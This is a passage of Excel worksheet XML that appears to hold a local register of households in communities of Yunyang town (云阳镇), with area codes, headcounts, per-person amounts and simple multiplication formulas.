        <f>B1616</f>
        <v>云阳镇</v>
      </c>
      <c r="C1617" s="17" t="str">
        <f>C1616</f>
        <v>老城社区</v>
      </c>
      <c r="D1617" s="17" t="s">
        <v>4335</v>
      </c>
      <c r="E1617" s="16" t="s">
        <v>3945</v>
      </c>
      <c r="F1617" s="17" t="str">
        <f>F1616</f>
        <v>4113210523</v>
      </c>
      <c r="G1617" s="17"/>
      <c r="H1617" s="17"/>
      <c r="I1617" s="17"/>
      <c r="J1617" s="17"/>
      <c r="K1617" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1618" customHeight="1" spans="1:11">
      <c r="A1618" s="16" t="s">
        <v>4336</v>
      </c>
      <c r="B1618" s="17" t="str">
        <f>B1617</f>
        <v>云阳镇</v>
      </c>
      <c r="C1618" s="17" t="str">
        <f>C1617</f>
        <v>老城社区</v>
      </c>
      <c r="D1618" s="49" t="s">
        <v>4337</v>
      </c>
      <c r="E1618" s="16" t="s">
        <v>4338</v>
      </c>
      <c r="F1618" s="17" t="str">
        <f>F1617</f>
        <v>4113210523</v>
      </c>
      <c r="G1618" s="17"/>
      <c r="H1618" s="17"/>
      <c r="I1618" s="17"/>
      <c r="J1618" s="17"/>
      <c r="K1618" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1619" customHeight="1" spans="1:11">
      <c r="A1619" s="16" t="s">
        <v>4339</v>
      </c>
      <c r="B1619" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1619" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1619" s="17" t="s">
        <v>4340</v>
      </c>
      <c r="E1619" s="17" t="s">
        <v>4341</v>
      </c>
      <c r="F1619" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1619" s="17">
        <v>1</v>
      </c>
      <c r="H1619" s="18">
        <v>365</v>
      </c>
      <c r="I1619" s="17">
        <f>H1619*G1619</f>
        <v>365</v>
      </c>
      <c r="J1619" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1619" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1620" customHeight="1" spans="1:11">
      <c r="A1620" s="16" t="s">
        <v>4342</v>
      </c>
      <c r="B1620" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1620" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1620" s="17" t="s">
        <v>4343</v>
      </c>
      <c r="E1620" s="17" t="s">
        <v>4344</v>
      </c>
      <c r="F1620" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1620" s="17">
        <v>1</v>
      </c>
      <c r="H1620" s="18">
        <v>365</v>
      </c>
      <c r="I1620" s="17">
        <f>H1620*G1620</f>
        <v>365</v>
      </c>
      <c r="J1620" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1620" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1621" customHeight="1" spans="1:11">
      <c r="A1621" s="16" t="s">
        <v>4345</v>
      </c>
      <c r="B1621" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1621" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1621" s="17" t="s">
        <v>4346</v>
      </c>
      <c r="E1621" s="17" t="s">
        <v>4347</v>
      </c>
      <c r="F1621" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1621" s="17">
        <v>1</v>
      </c>
      <c r="H1621" s="18">
        <v>365</v>
      </c>
      <c r="I1621" s="17">
        <f>H1621*G1621</f>
        <v>365</v>
      </c>
      <c r="J1621" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1621" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1622" customHeight="1" spans="1:11">
      <c r="A1622" s="16" t="s">
        <v>4348</v>
      </c>
      <c r="B1622" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1622" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1622" s="17" t="s">
        <v>4349</v>
      </c>
      <c r="E1622" s="17" t="s">
        <v>4350</v>
      </c>
      <c r="F1622" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1622" s="17">
        <v>1</v>
      </c>
      <c r="H1622" s="18">
        <v>365</v>
      </c>
      <c r="I1622" s="17">
        <f>H1622*G1622</f>
        <v>365</v>
      </c>
      <c r="J1622" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1622" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1623" customHeight="1" spans="1:11">
      <c r="A1623" s="16" t="s">
        <v>4351</v>
      </c>
      <c r="B1623" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1623" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1623" s="17" t="s">
        <v>4352</v>
      </c>
      <c r="E1623" s="17" t="s">
        <v>3693</v>
      </c>
      <c r="F1623" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1623" s="17">
        <v>2</v>
      </c>
      <c r="H1623" s="18">
        <v>325</v>
      </c>
      <c r="I1623" s="17">
        <f>H1623*G1623</f>
        <v>650</v>
      </c>
      <c r="J1623" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1623" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1624" customHeight="1" spans="1:11">
      <c r="A1624" s="16" t="s">
        <v>4353</v>
      </c>
      <c r="B1624" s="17" t="str">
        <f>B1623</f>
        <v>云阳镇</v>
      </c>
      <c r="C1624" s="17" t="str">
        <f>C1623</f>
        <v>老城社区</v>
      </c>
      <c r="D1624" s="23" t="s">
        <v>4354</v>
      </c>
      <c r="E1624" s="24" t="s">
        <v>4347</v>
      </c>
      <c r="F1624" s="17" t="str">
        <f>F1623</f>
        <v>4113210523</v>
      </c>
      <c r="G1624" s="17"/>
      <c r="H1624" s="17"/>
      <c r="I1624" s="17"/>
      <c r="J1624" s="17"/>
      <c r="K1624" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1625" customHeight="1" spans="1:11">
      <c r="A1625" s="16" t="s">
        <v>4355</v>
      </c>
      <c r="B1625" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1625" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1625" s="17" t="s">
        <v>4356</v>
      </c>
      <c r="E1625" s="17" t="s">
        <v>4357</v>
      </c>
      <c r="F1625" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1625" s="17">
        <v>1</v>
      </c>
      <c r="H1625" s="18">
        <v>365</v>
      </c>
      <c r="I1625" s="17">
        <f>H1625*G1625</f>
        <v>365</v>
      </c>
      <c r="J1625" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1625" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1626" customHeight="1" spans="1:11">
      <c r="A1626" s="16" t="s">
        <v>4358</v>
      </c>
      <c r="B1626" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1626" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1626" s="17" t="s">
        <v>4359</v>
      </c>
      <c r="E1626" s="17" t="s">
        <v>4360</v>
      </c>
      <c r="F1626" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1626" s="17">
        <v>2</v>
      </c>
      <c r="H1626" s="18">
        <v>325</v>
      </c>
      <c r="I1626" s="17">
        <f>H1626*G1626</f>
        <v>650</v>
      </c>
      <c r="J1626" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1626" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1627" customHeight="1" spans="1:11">
      <c r="A1627" s="16" t="s">
        <v>4361</v>
      </c>
      <c r="B1627" s="17" t="str">
        <f>B1626</f>
        <v>云阳镇</v>
      </c>
      <c r="C1627" s="17" t="str">
        <f>C1626</f>
        <v>老城社区</v>
      </c>
      <c r="D1627" s="17" t="s">
        <v>4362</v>
      </c>
      <c r="E1627" s="16" t="s">
        <v>4363</v>
      </c>
      <c r="F1627" s="17" t="str">
        <f>F1626</f>
        <v>4113210523</v>
      </c>
      <c r="G1627" s="17"/>
      <c r="H1627" s="17"/>
      <c r="I1627" s="17"/>
      <c r="J1627" s="17"/>
      <c r="K1627" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1628" customHeight="1" spans="1:11">
      <c r="A1628" s="16" t="s">
        <v>4364</v>
      </c>
      <c r="B1628" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1628" s="17" t="s">
        <v>4327</v>
      </c>
      <c r="D1628" s="17" t="s">
        <v>4365</v>
      </c>
      <c r="E1628" s="17" t="s">
        <v>3935</v>
      </c>
      <c r="F1628" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1628" s="17">
        <v>1</v>
      </c>
      <c r="H1628" s="18">
        <v>365</v>
      </c>
      <c r="I1628" s="17">
        <f>H1628*G1628</f>
        <v>365</v>
      </c>
      <c r="J1628" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1628" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1629" customHeight="1" spans="1:11">
      <c r="A1629" s="16" t="s">
        <v>4366</v>
      </c>
      <c r="B1629" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1629" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1629" s="17" t="s">
        <v>4368</v>
      </c>
      <c r="E1629" s="17" t="s">
        <v>4369</v>
      </c>
      <c r="F1629" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1629" s="17">
        <v>1</v>
      </c>
      <c r="H1629" s="18">
        <v>365</v>
      </c>
      <c r="I1629" s="17">
        <f>H1629*G1629</f>
        <v>365</v>
      </c>
      <c r="J1629" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1629" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1630" customHeight="1" spans="1:11">
      <c r="A1630" s="16" t="s">
        <v>4370</v>
      </c>
      <c r="B1630" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1630" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1630" s="17" t="s">
        <v>4371</v>
      </c>
      <c r="E1630" s="17" t="s">
        <v>4372</v>
      </c>
      <c r="F1630" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1630" s="17">
        <v>2</v>
      </c>
      <c r="H1630" s="18">
        <v>325</v>
      </c>
      <c r="I1630" s="17">
        <f>H1630*G1630</f>
        <v>650</v>
      </c>
      <c r="J1630" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1630" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1631" customHeight="1" spans="1:11">
      <c r="A1631" s="16" t="s">
        <v>4373</v>
      </c>
      <c r="B1631" s="17" t="str">
        <f>B1630</f>
        <v>云阳镇</v>
      </c>
      <c r="C1631" s="17" t="str">
        <f>C1630</f>
        <v>云钢社区</v>
      </c>
      <c r="D1631" s="50" t="s">
        <v>4374</v>
      </c>
      <c r="E1631" s="50" t="s">
        <v>4375</v>
      </c>
      <c r="F1631" s="17" t="str">
        <f>F1630</f>
        <v>4113210599</v>
      </c>
      <c r="G1631" s="17"/>
      <c r="H1631" s="17"/>
      <c r="I1631" s="17"/>
      <c r="J1631" s="17"/>
      <c r="K1631" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1632" customHeight="1" spans="1:11">
      <c r="A1632" s="16" t="s">
        <v>4376</v>
      </c>
      <c r="B1632" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1632" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1632" s="17" t="s">
        <v>3991</v>
      </c>
      <c r="E1632" s="17" t="s">
        <v>4377</v>
      </c>
      <c r="F1632" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1632" s="17">
        <v>1</v>
      </c>
      <c r="H1632" s="18">
        <v>365</v>
      </c>
      <c r="I1632" s="17">
        <f>H1632*G1632</f>
        <v>365</v>
      </c>
      <c r="J1632" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1632" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1633" customHeight="1" spans="1:11">
      <c r="A1633" s="16" t="s">
        <v>4378</v>
      </c>
      <c r="B1633" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1633" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1633" s="17" t="s">
        <v>4379</v>
      </c>
      <c r="E1633" s="17" t="s">
        <v>4380</v>
      </c>
      <c r="F1633" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1633" s="17">
        <v>1</v>
      </c>
      <c r="H1633" s="18">
        <v>365</v>
      </c>
      <c r="I1633" s="17">
        <f>H1633*G1633</f>
        <v>365</v>
      </c>
      <c r="J1633" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1633" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1634" customHeight="1" spans="1:11">
      <c r="A1634" s="16" t="s">
        <v>4381</v>
      </c>
      <c r="B1634" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1634" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1634" s="17" t="s">
        <v>4382</v>
      </c>
      <c r="E1634" s="17" t="s">
        <v>4383</v>
      </c>
      <c r="F1634" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1634" s="17">
        <v>1</v>
      </c>
      <c r="H1634" s="18">
        <v>365</v>
      </c>
      <c r="I1634" s="17">
        <f>H1634*G1634</f>
        <v>365</v>
      </c>
      <c r="J1634" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1634" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1635" customHeight="1" spans="1:11">
      <c r="A1635" s="16" t="s">
        <v>4384</v>
      </c>
      <c r="B1635" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1635" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1635" s="17" t="s">
        <v>1826</v>
      </c>
      <c r="E1635" s="17" t="s">
        <v>3727</v>
      </c>
      <c r="F1635" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1635" s="17">
        <v>1</v>
      </c>
      <c r="H1635" s="18">
        <v>365</v>
      </c>
      <c r="I1635" s="17">
        <f>H1635*G1635</f>
        <v>365</v>
      </c>
      <c r="J1635" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1635" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1636" customHeight="1" spans="1:11">
      <c r="A1636" s="16" t="s">
        <v>4385</v>
      </c>
      <c r="B1636" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1636" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1636" s="17" t="s">
        <v>4386</v>
      </c>
      <c r="E1636" s="17" t="s">
        <v>4387</v>
      </c>
      <c r="F1636" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1636" s="17">
        <v>2</v>
      </c>
      <c r="H1636" s="18">
        <v>325</v>
      </c>
      <c r="I1636" s="17">
        <f>H1636*G1636</f>
        <v>650</v>
      </c>
      <c r="J1636" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1636" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1637" customHeight="1" spans="1:11">
      <c r="A1637" s="16" t="s">
        <v>4388</v>
      </c>
      <c r="B1637" s="17" t="str">
        <f>B1636</f>
        <v>云阳镇</v>
      </c>
      <c r="C1637" s="17" t="str">
        <f>C1636</f>
        <v>云钢社区</v>
      </c>
      <c r="D1637" s="51" t="s">
        <v>4389</v>
      </c>
      <c r="E1637" s="51" t="s">
        <v>4390</v>
      </c>
      <c r="F1637" s="17" t="str">
        <f>F1636</f>
        <v>4113210599</v>
      </c>
      <c r="G1637" s="17"/>
      <c r="H1637" s="17"/>
      <c r="I1637" s="17"/>
      <c r="J1637" s="17"/>
      <c r="K1637" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1638" customHeight="1" spans="1:11">
      <c r="A1638" s="16" t="s">
        <v>4391</v>
      </c>
      <c r="B1638" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1638" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1638" s="17" t="s">
        <v>4392</v>
      </c>
      <c r="E1638" s="17" t="s">
        <v>4393</v>
      </c>
      <c r="F1638" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1638" s="17">
        <v>1</v>
      </c>
      <c r="H1638" s="18">
        <v>365</v>
      </c>
      <c r="I1638" s="17">
        <f t="shared" ref="I1638:I1645" si="87">H1638*G1638</f>
        <v>365</v>
      </c>
      <c r="J1638" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1638" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1639" customHeight="1" spans="1:11">
      <c r="A1639" s="16" t="s">
        <v>4394</v>
      </c>
      <c r="B1639" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1639" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1639" s="17" t="s">
        <v>4395</v>
      </c>
      <c r="E1639" s="17" t="s">
        <v>4396</v>
      </c>
      <c r="F1639" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1639" s="17">
        <v>1</v>
      </c>
      <c r="H1639" s="18">
        <v>365</v>
      </c>
      <c r="I1639" s="17">
        <f t="shared" si="87"/>
        <v>365</v>
      </c>
      <c r="J1639" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1639" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1640" customHeight="1" spans="1:11">
      <c r="A1640" s="16" t="s">
        <v>4397</v>
      </c>
      <c r="B1640" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1640" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1640" s="17" t="s">
        <v>4398</v>
      </c>
      <c r="E1640" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1640" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1640" s="17">
        <v>1</v>
      </c>
      <c r="H1640" s="18">
        <v>365</v>
      </c>
      <c r="I1640" s="17">
        <f t="shared" si="87"/>
        <v>365</v>
      </c>
      <c r="J1640" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1640" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1641" customHeight="1" spans="1:11">
      <c r="A1641" s="16" t="s">
        <v>4399</v>
      </c>
      <c r="B1641" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1641" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1641" s="17" t="s">
        <v>4400</v>
      </c>
      <c r="E1641" s="17" t="s">
        <v>3945</v>
      </c>
      <c r="F1641" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1641" s="17">
        <v>1</v>
      </c>
      <c r="H1641" s="18">
        <v>365</v>
      </c>
      <c r="I1641" s="17">
        <f t="shared" si="87"/>
        <v>365</v>
      </c>
      <c r="J1641" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1641" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1642" customHeight="1" spans="1:11">
      <c r="A1642" s="16" t="s">
        <v>4401</v>
      </c>
      <c r="B1642" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1642" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1642" s="17" t="s">
        <v>4402</v>
      </c>
      <c r="E1642" s="17" t="s">
        <v>780</v>
      </c>
      <c r="F1642" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1642" s="17">
        <v>1</v>
      </c>
      <c r="H1642" s="18">
        <v>365</v>
      </c>
      <c r="I1642" s="17">
        <f t="shared" si="87"/>
        <v>365</v>
      </c>
      <c r="J1642" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1642" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1643" customHeight="1" spans="1:11">
      <c r="A1643" s="16" t="s">
        <v>4403</v>
      </c>
      <c r="B1643" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1643" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1643" s="17" t="s">
        <v>4404</v>
      </c>
      <c r="E1643" s="17" t="s">
        <v>4405</v>
      </c>
      <c r="F1643" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1643" s="17">
        <v>1</v>
      </c>
      <c r="H1643" s="18">
        <v>365</v>
      </c>
      <c r="I1643" s="17">
        <f t="shared" si="87"/>
        <v>365</v>
      </c>
      <c r="J1643" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1643" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1644" customHeight="1" spans="1:11">
      <c r="A1644" s="16" t="s">
        <v>4406</v>
      </c>
      <c r="B1644" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1644" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1644" s="17" t="s">
        <v>4407</v>
      </c>
      <c r="E1644" s="17" t="s">
        <v>3607</v>
      </c>
      <c r="F1644" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1644" s="17">
        <v>1</v>
      </c>
      <c r="H1644" s="18">
        <v>365</v>
      </c>
      <c r="I1644" s="17">
        <f t="shared" si="87"/>
        <v>365</v>
      </c>
      <c r="J1644" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1644" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1645" customHeight="1" spans="1:11">
      <c r="A1645" s="16" t="s">
        <v>4408</v>
      </c>
      <c r="B1645" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1645" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1645" s="17" t="s">
        <v>4409</v>
      </c>
      <c r="E1645" s="17" t="s">
        <v>4350</v>
      </c>
      <c r="F1645" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1645" s="17">
        <v>1</v>
      </c>
      <c r="H1645" s="18">
        <v>365</v>
      </c>
      <c r="I1645" s="17">
        <f t="shared" si="87"/>
        <v>365</v>
      </c>
      <c r="J1645" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1645" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1646" customHeight="1" spans="1:11">
      <c r="A1646" s="16" t="s">
        <v>4410</v>
      </c>
      <c r="B1646" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1646" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1646" s="17" t="s">
        <v>4411</v>
      </c>
      <c r="E1646" s="17" t="s">
        <v>3849</v>
      </c>
      <c r="F1646" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1646" s="17">
        <v>1</v>
      </c>
      <c r="H1646" s="18">
        <v>365</v>
      </c>
      <c r="I1646" s="17">
        <f t="shared" ref="I1646:I1653" si="88">H1646*G1646</f>
        <v>365</v>
      </c>
      <c r="J1646" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1646" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1647" customHeight="1" spans="1:11">
      <c r="A1647" s="16" t="s">
        <v>4412</v>
      </c>
      <c r="B1647" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1647" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1647" s="17" t="s">
        <v>4060</v>
      </c>
      <c r="E1647" s="17" t="s">
        <v>3690</v>
      </c>
      <c r="F1647" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1647" s="17">
        <v>1</v>
      </c>
      <c r="H1647" s="18">
        <v>365</v>
      </c>
      <c r="I1647" s="17">
        <f t="shared" si="88"/>
        <v>365</v>
      </c>
      <c r="J1647" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1647" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1648" customHeight="1" spans="1:11">
      <c r="A1648" s="16" t="s">
        <v>4413</v>
      </c>
      <c r="B1648" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1648" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1648" s="17" t="s">
        <v>4414</v>
      </c>
      <c r="E1648" s="17" t="s">
        <v>4415</v>
      </c>
      <c r="F1648" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1648" s="17">
        <v>1</v>
      </c>
      <c r="H1648" s="18">
        <v>365</v>
      </c>
      <c r="I1648" s="17">
        <f t="shared" si="88"/>
        <v>365</v>
      </c>
      <c r="J1648" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1648" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1649" customHeight="1" spans="1:11">
      <c r="A1649" s="16" t="s">
        <v>4416</v>
      </c>
      <c r="B1649" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1649" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1649" s="17" t="s">
        <v>4417</v>
      </c>
      <c r="E1649" s="17" t="s">
        <v>2500</v>
      </c>
      <c r="F1649" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1649" s="17">
        <v>1</v>
      </c>
      <c r="H1649" s="18">
        <v>365</v>
      </c>
      <c r="I1649" s="17">
        <f t="shared" si="88"/>
        <v>365</v>
      </c>
      <c r="J1649" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1649" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1650" customHeight="1" spans="1:11">
      <c r="A1650" s="16" t="s">
        <v>4418</v>
      </c>
      <c r="B1650" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1650" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1650" s="17" t="s">
        <v>4419</v>
      </c>
      <c r="E1650" s="17" t="s">
        <v>4420</v>
      </c>
      <c r="F1650" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1650" s="17">
        <v>1</v>
      </c>
      <c r="H1650" s="18">
        <v>365</v>
      </c>
      <c r="I1650" s="17">
        <f t="shared" si="88"/>
        <v>365</v>
      </c>
      <c r="J1650" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1650" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1651" customHeight="1" spans="1:11">
      <c r="A1651" s="16" t="s">
        <v>4421</v>
      </c>
      <c r="B1651" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1651" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1651" s="17" t="s">
        <v>4422</v>
      </c>
      <c r="E1651" s="17" t="s">
        <v>4423</v>
      </c>
      <c r="F1651" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1651" s="17">
        <v>1</v>
      </c>
      <c r="H1651" s="18">
        <v>365</v>
      </c>
      <c r="I1651" s="17">
        <f t="shared" si="88"/>
        <v>365</v>
      </c>
      <c r="J1651" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1651" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1652" customHeight="1" spans="1:11">
      <c r="A1652" s="16" t="s">
        <v>4424</v>
      </c>
      <c r="B1652" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1652" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1652" s="17" t="s">
        <v>4425</v>
      </c>
      <c r="E1652" s="17" t="s">
        <v>4256</v>
      </c>
      <c r="F1652" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1652" s="17">
        <v>1</v>
      </c>
      <c r="H1652" s="18">
        <v>365</v>
      </c>
      <c r="I1652" s="17">
        <f t="shared" si="88"/>
        <v>365</v>
      </c>
      <c r="J1652" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1652" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1653" customHeight="1" spans="1:11">
      <c r="A1653" s="16" t="s">
        <v>4426</v>
      </c>
      <c r="B1653" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1653" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1653" s="17" t="s">
        <v>4427</v>
      </c>
      <c r="E1653" s="17" t="s">
        <v>3715</v>
      </c>
      <c r="F1653" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1653" s="17">
        <v>2</v>
      </c>
      <c r="H1653" s="18">
        <v>325</v>
      </c>
      <c r="I1653" s="17">
        <f t="shared" si="88"/>
        <v>650</v>
      </c>
      <c r="J1653" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1653" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1654" customHeight="1" spans="1:11">
      <c r="A1654" s="16" t="s">
        <v>4428</v>
      </c>
      <c r="B1654" s="17" t="str">
        <f>B1653</f>
        <v>云阳镇</v>
      </c>
      <c r="C1654" s="17" t="str">
        <f>C1653</f>
        <v>云钢社区</v>
      </c>
      <c r="D1654" s="51" t="s">
        <v>4429</v>
      </c>
      <c r="E1654" s="32" t="s">
        <v>3693</v>
      </c>
      <c r="F1654" s="17" t="str">
        <f>F1653</f>
        <v>4113210599</v>
      </c>
      <c r="G1654" s="17"/>
      <c r="H1654" s="17"/>
      <c r="I1654" s="17"/>
      <c r="J1654" s="17"/>
      <c r="K1654" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1655" customHeight="1" spans="1:11">
      <c r="A1655" s="16" t="s">
        <v>4430</v>
      </c>
      <c r="B1655" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1655" s="17" t="s">
        <v>4367</v>
      </c>
      <c r="D1655" s="17" t="s">
        <v>4431</v>
      </c>
      <c r="E1655" s="17" t="s">
        <v>3727</v>
      </c>
      <c r="F1655" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G1655" s="17">
        <v>3</v>
      </c>
      <c r="H1655" s="18">
        <v>290</v>
      </c>
      <c r="I1655" s="17">
        <f>H1655*G1655</f>
        <v>870</v>
      </c>
      <c r="J1655" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K1655" s="17" t="s">
        <v>225</v>
      </c>
    </row>
